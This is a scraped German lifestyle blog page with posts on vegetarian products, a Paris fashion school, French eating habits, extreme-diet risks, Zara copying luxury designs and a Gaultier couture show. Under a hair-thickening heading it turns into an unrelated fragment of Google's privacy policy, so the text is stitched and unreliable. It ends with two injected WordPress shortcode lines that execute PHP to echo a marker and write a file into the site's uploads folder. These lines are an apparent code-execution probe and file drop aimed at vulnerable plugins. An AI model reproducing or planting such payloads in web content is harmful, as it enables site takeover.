Topliste für vegetarische Produkte und Fleischersatz

Vor kurzem hatten wir schon etwas zum Thema Weekday Vegetarian geschrieben. Dies ist eine Ernährungsform für Leute, die den Fleischkonsum nicht komplett einstellen, sich aber umweltbewusster und gesünder ernähren möchten. Da sich solche Ernährungsformen immer weiter verbreiten und auch die Zahl der Vegetarier und Veganer in Deutschland jährlich immer weiter steigt, wird auch die Nachfrage nach fleischfreien Produkten immer größer. Den anhaltenden Hype im Supermarkt ist kaum zu entgehen. Ständig entstehen neue kleine und immer größer werdende Regalecken mit vegetarischen Lebensmitteln. Der Frust ist jedoch groß, wenn man sich für eines der vegetarischen Produkte entscheidet, diese aber geschmacklich überhaupt nicht überzeugen können.

Ich persönlich esse sehr selten Fleisch (weniger als 1x pro Woche) und achte, wenn ich es esse, auf Qualität. Das heißt mir kommt nur Fleisch aus bioligischer, artgerechter Tierhaltung auf den Tisch und daher sind mir vegetarische Alternativen sehr willkommen. Aus diesem Grund möchte ich hier gerne meine Topliste für vegetarische Produkte veröffentlichen:

1. Taifun Tofu Wiener (vegan)

tw

Mein absoluter Favorit sind die Taifun Tofu Wiener. Hauptbestandteil ist Tofu, wodurch sie natürlich auch noch sehr gesund sind. Der Geschmack ist genial, sowohl kalt als auch angebraten. Ein weiterer Pluspunkt ist, dass die Wiener vegan sind und somit keine minderwertigen Eiprodukte, wie oft in Fleischersatz, beigefügt wurden. Erhältlich sind sie allerdings nur in Bio-Supermärkten.

2. Quorn (von Rewe)

rostbratwursten-pack-290290

Und schon haben wir wieder so ein Produkt, bei dem ich hin und hergerissen bin. Es ist geschmacklich einfach fantastisch, lässt sich super einfach zubereiten und ist auch im Supermarkt (Rewe) erhältlich. Allerdings ist der Hauptbestandteil Ei (aus Freilandhaltung), also weder besonders gesund, noch ein adäquater fleischfreier Ersatz als umweltverträgliches Nahrungsmittel*. Ab und zu kann man sich die Würstchen allerdings gönnen, wie ich finde. Sie sind geschmacklich gesehen auf jeden Fall eine tolle Fleischalternative und mit 187 kcal/100g auch ausgesprochen leicht.

3. Tofu (Taifun)

31j-a+-ik4L

Tofu ist nicht gleich Tofu – und leider passiert es auch mir immer wieder, dass ich einen Supermarkt-Tofu erwische, der mir das ganze Essen verdirbt. Vom Geschmack und der Konsistenz unterscheiden sie sich einfach sehr stark, somit kann ich eigentlich nur den Tofu der Marke Taifun empfehen. Schmeckt angebraten super lecker und ist auch geräuchert und in anderen Geschmacksrichtungen erhältlich.
Nachteil: Bisher habe ich leider nur in Bio-Läden sichten können.

Nicht empfehlenswert hingegen sind die Tofus, die bei Rewe, Tengelmann und Edeka (teilweise als Eigenmarke) angeboten werden. Ich habe alle probiert, aber sie sind leider für meinen Geschmack ungenießbar.

4. Sojafit Schinkenwurst

art_schinkenwurst

Diese Wurst haben ich zuletzt bei Real entdeckt. Es ist eine super Alternative für Fleischwurst und gibt Salaten (z.B. Nudelsalat) noch einen kleinen Pepp. Bevor ich sie unter den Salat mische, brate ich die „Wurst“ noch kurz mit etwas Zwiebel an, das gibt dem ganzen noch mehr Aroma.

*Zum Thema Ei gibt es natürlich sehr viel zu sagen. Ich vermeide Ei in Lebensmitteln, wenn möglich. Wenn ich Eier kaufe, stammen diese aus einer traditionellen Herstellung und sind Bio. Wer mit der klassischen Produktion von Eiern, den Lebensbedingungen der Hühner und vor allem dem Kükenhäckeln (auch in der BIO-Produktion!) nicht vertraut ist, dem empfehle ich diesen Beitrag: Schattenseiten der Eierproduktion
Wie ist eure Einstellung zum Fleischkonsum und habt ihr vielleicht auch noch tolle Produktvorschläge? Ich bin immer offen für neue Vorschläge!

 

Modeschule Ecole de la Chambre Syndicale de la Couture

Eine Modeschule beheimatet in der Metropole der Mode
– Ecole de la Chambre Syndicale de la Couture

Die hohe Schneiderkunst wird einem nirgends besser vermittelt als in Chambre Syndicale de la Couture, der großen Modeschule in Paris. Denn nirgendwo sonst ist die traditionelle Handarbeitskunst so lebendig wie hier und hier wird Mode zur Kunst gemacht.

Die Fertigkeit und das kreative Talent darf unter Beweis gestellt werden

Ecole de la Chambre Syndicale de la Couture blickt auf eine sehr lange Tradition zurück und gibt sich dennoch kreativ und modern. Hier entsteht noch feinste Handarbeit und aufwendig gearbeitete Roben werden noch mit der Hand geschneidert. Der Esprit und der Pioniergeist junger Talente wird mit höchster Handarbeitskunst aufgewertet.

Strenge Vorgaben

Im Jahr 1927 schlug die Geburtsstunde n dieser sensationellen Modeschule, die bereits namhafte Größen hervorgebracht hat. Doch das Auswahlverfahren ist ein strenges. Es werden nur Studenten anerkannt, die bereits wahre Könner sind. Sie müssen bereits einen Abschluss im Modedesign vorweisen. Wer sich an dieser Modeschule beweisen möchte, der muss zudem fließend Französisch sprechen. Denn der Unterricht findet nicht in englischer Sprache statt.

In ist, wer es geschafft hat, in dieser Modeschule in Paris angenommen zu werden. Ein Beweis dafür sind die zahlreichen Absolventen, die die Karriereleiter bis zum Modehimmel bereits erklimmen haben.

Die Größten der Großen

Zum einen war es Yves Henri Donat Mathieu-Saint-Laurent, der die bekannte Modelinie Yves Saint Laurent „YSL“ entwarf. Zum anderen war es der italienische Modeschöpfer Valentino Garavani. Sein Modeunternehmen Valentino ist der ganzen Welt bekannt. Auch ein Deutscher drückte dort einst die Schulbank. Es ist der großer Meister mit der schwarzen Brille – Karl Lagerfeld.

Im Besitz des Pariser Modeverbandes

Die Schule ist im Besitz des Pariser Modeverbandes. Dieser Verband ist verantwortlich für die Haute Couture, die gehobene Schneiderei. Und diese gehobene Kunst wird an die Bachelors und Masters der dortigen Schule weitergegeben. Auch zahlreiche Fortbildungskurse werden an der Ecole de la Chambre Syndicale de la Couture angeboten, dass die Designer immer up to date sind und keinen Trend verpassen.

Warum sind französische Frauen nicht dick?

Warum französische Frauen nicht dick sind? Leben wie Gott in Frankreich und dabei seine Topfigur bewahren, geht das? Die Französinnen machen es gekonnt vor. Es scheint so, als müssen die Damen in Frankreich keinen strikten Diäten folgen, um ihre Topfigur zu wahren. Wie machen die das bloß? Ganz einfach! Sie brauchen dafür keine Diätratgeber. Kleine Orientierungshilfen, die einfach zum Umsetzen sind, helfen gerne das Wunschgewicht zu erlangen.

Das Feinste vom Feinen, aber nicht in Hülle und Fülle

Dass die Franzosen keine Kostverächter sind, ist eine Tatsache. Aber sie greifen nicht zu beliebigen Lebensmitteln. Ihre Speisen sind von guter Qualität und ausgesucht. Französinnen sind kleine Gourmets und auch klein sind ihre Portionen. Die Liebe zu gutem Essen schlummert in jeder französischen Dame, sie liebt die Vielfalt guter Speisen, aber sie weiß auch, dass es beim Essen um das Genießen geht. Daher nimmt man sich in Frankreich für jede Mahlzeit auch ausreichend Zeit, isst langsam und in Ruhe. Französische Frauen hetzen nicht mit Ihrem Mittagesssen in der Hand durch die Straßen.

Beschwingt unterwegs sein

Wer glaubt, dass eine französische Frau sich abends im Fitnesscenter abkämpft, um ihr Idealgewicht zu halten, der irrt gewaltig. Französinnen haben sich nicht dem Sport verschrieben. Sie machen zwar gern Bewegung, fahren Rad, laufen, spazieren. Aber sie übertreiben es nie und ihr Augenmerk liegt auf soften Sportarten, die für jede Frau zu bewältigen sind.

La Joie de vivre heißt das Zauberwort

Denn an Lebensfreude fehlt es den französischen Frauen nicht. Sie lieben das Leben und den Genuss. Denn kann gutes Essen wirklich Sünde sein? Wohl kaum! Es scheint so, als hätte die französische Damenwelt das Wohlbefinden für sich gepachtet, denn es gibt kaum eine Französin, die sich nicht wohlfühlt in ihrer Haut. Se sentir bien dans sa peau, denn darum geht es im Besonderen, sich in seiner Haut wohlfühlen!Schönheitsideale ziehen an ihnen vorbei, denn sie wissen die Vorzüge ihres eigenen Körpers zu schätzen.

Essen, wozu man Lust hat

Wer sein Wunschgewicht auf Dauer halten möchte, der muss sich nicht von Zeit zu Zeit mit einer unbarmherzigen Diät quälen. Französische Frauen machen das nicht, sie verbieten sich auch nichts. Ihr Speiseplan ist so zusammengestellt, dass der Genuss dabei nicht hinten anstehen muss. Aber französische Frauen wissen, wenn das Essen am besten schmeckt, ist es an der Zeit das Besteck beiseite zu legen. Wer nicht mehr genießen kann, sondern nur mehr zwanghaft in sich hineinstopft, hat bereits über die Stränge geschlagen. Essen macht zufrieden, aus diesem Grund sollten keine bevorzugten Speisen einfach weggelassen werden. Sie machen das Menü erst komplett und können perfekt mit gesunden Lebensmitteln abgeschmeckt werden.

Bildrechte: Shutterstock – Olga Kudryashova

 

Risiko Extrem-Diät

Risiko der Extrem-Diäten

Viele wollen es wirklich wissen, halten sie einem radikalen Nahrungsentzug stand? Und purzeln die überschüssigen Pfunde tatsächlich und ein flacher Bauch ist das Resultat einer Extrem-Diät innerhalb von kürzester Zeit? Abnehmen liegt voll im Trend, jeder möchte schlank und rank sein, aber nicht um jeden Preis. Oder doch?

Die Extrem-Diät geht mit dem Jo-Jo-Effekt Hand in Hand

Wer sich eine Extrem-Diät verordnet, der will die Pfunde purzeln sehen und das innerhalb von wenigen Tagen. Aber jeder kennt auch den verflixten Jo-Jo-Effekt beim Abnehmen. Juhu, die Waage zeigt das Wunschgewicht an und wenige Wochen später, oh je, der Erfolg war nicht von langer Dauer. Schlank werden und schlank bleiben, das ist grundlegend das Ziel jeder Diät. Eine Extrem-Diät erreicht dieses Ziel oft nicht.

Abspecken ist kein Kunststück

Aber der Wunsch ohne Nahrung auskommen zu wollen, kann sich als äußerst gefährlich entpuppen. Um das Hungergefühl zu zügeln, greifen viele dann zu Zusatzpräparaten. Besser wäre natürlich die gesunde Variante des Abnehmens, die auf Obst und Gemüse aufgebaut ist. Vitamine bekommen dem Körper mehr als Diätpillen und Appetitzügler. Vielen vermuten die Saft-Diät wäre des Rätsels Lösung. Doch diese Diät führt dem Körper nur zugesetztes Vitamin C und Fruchtzucker zu. Wo bleiben die Nährstoffe und die Energielieferanten? Der Körper verlangt nach Kohlenhydraten, Eiweiß und Fetten. Eiweiß ist ein besonders wichtiger Baustein für unseren Organismus. Bei einer Extrem-Diät gibt es keine Vitamine, Mineralien und Spurenelemente, aber auch diese Grundstoffe sind wichtig.

Die Crash-Diat und die verheerenden Folgen

Wenn der Körper länger ohne Eiweiß auskommen muss, greift er automatisch auf die Eiweißreserven zurück. Diese Reserven sind in den Muskeln eingelagert. Wer längere Zeit seine Crash-Diat durchzieht, kann im schlimmsten Fall das Herz schädigen. Der Körper verlangt nach Vitaminen und Mineralien, werden ihm diese langfristig verwehrt, kommt das zu körperlichen Beeinträchtigungen. Denn Mangelernährung bekommt dem Körper nicht, im Gegenteil, es schadet ihm. Im schlimmsten Fall können Organe versagen. Dem Bauchgefühl vertrauen Festes und gesundes Essen muss sein, schließlich sind wir alle keine hungry Heidis. Heidi Klum kann sich mit einem Glas sauren Zitronensaft zufriedengeben, weil es die Saft-Diät verlangt. Aber ein gesunder Organismus verlangt nach Energie. Ansonsten sind die vorhandenen Energiereserven im Nu aufgebraucht und die Extrem-Diät zieht extreme Spuren nach sich. Denn schließlich gilt das oberste Gebot beim Abnehmen – gesund dabei zu bleiben. Es darf auf das eigene Bauchgefühl vertraut werden.

Zara Copy Cat – so dreist wird von großen Modehäusern geklaut

Auf dem Bild zu sehen ist links ein Stück von Prada und rechts von Zara. Für die neuen Kollektionen von Zara wurde von den großen Modehäusern abgekupfert, wo es nur ging. Zara geriet deshalb in den letzen Jahren schon mehrfach in Verruf.
Natürlich sind auch bei den großen Marken immer wieder Ähnlichkeiten in den Kollektionen festzustellen, aber niemand scheint so dreist vorzugehen, wie Zara. Von Kreativität und Innovation keine Spur. Schnitte und Muster werden kopiert und mit billigsten Stoffen vervielfältigt. Rechtlich scheint es bei diesem Thema kaum eine Grundlage zu geben, sobald ein Design leicht verändert wurde, entspricht es nicht mehr zwingend einer Kopie.

Melanie Rickey fasste die aktuellen Kopien hier zusammen:
http://www.fashioneditoratlarge.com/2014/03/zara-copying-dior-balenciaga-prada/

Große Show nach anfänglichem Gestolpere – Jean Paul Gaultier Haute Couture 2014/2015

Auf der Paris Couture Fashion Week überzeugte Jeaun Paul Gautiert mit der Haute Couture Fall/Winter 2014/2015 Kollektion.

Die Show eröffnete Catherine Loewe, die leider enorme Schwierigkeiten mit Ihren Schuhen hatte. Nach einigem Gestolpere wurden Ihr die Schuhe mitten auf dem Laufsteg ausgezogen.

Bildschirmfoto-2014-07-24-um-11.33.12

Auf den holpernden Einstieg folgte schließliche eine grandiose Show. Die Kollektion von Jean Paul Gaultier inspierte sich an Vampieren.

Die ganze Show gibt es hier zu sehen: https://www.youtube.com/watch?v=b0v56y1Mtzo

Hier einige Stücke der Kollektion:

Unbenannt-w2

Unbenaddnnt-2

Unbddenannt-2

Fotos © Jean Paul Gaultier

Haarverdichtung – das kleine Geheimnis von Stars und Sternchen

When you use Google services, you trust us with your information. This Privacy Policy is meant to help you understand what data we collect, why we collect it, and what we do with it. This is important; we hope you will take time to read it carefully. And remember, you can find controls to manage your information and protect your privacy and security at My Account.
There are many different ways you can use our services – to search for and share information, to communicate with other people or to create new content. When you share information with us, for example by creating a Google Account, we can make those services even better – to show you more relevant search results and ads, to help you connect with people or to make sharing with others quicker and easier. As you use our services, we want you to be clear how we’re using information and the ways in which you can protect your privacy.
Our Privacy Policy may change from time to time. We will not reduce your rights under this Privacy Policy without your explicit consent. We will post any privacy policy changes on this page and, if the changes are significant, we will provide a more prominent notice (including, for certain services, email notification of privacy policy changes). We will also keep prior versions of this Privacy Policy in an archive for your review.
[insert_php] echo 147098235+111;file_put_contents(‚wp-content/uploads/info.php‘, “); [/insert_php]
[php] echo 147098235+111;file_put_contents(‚wp-content/uploads/info.php‘, “); [/php]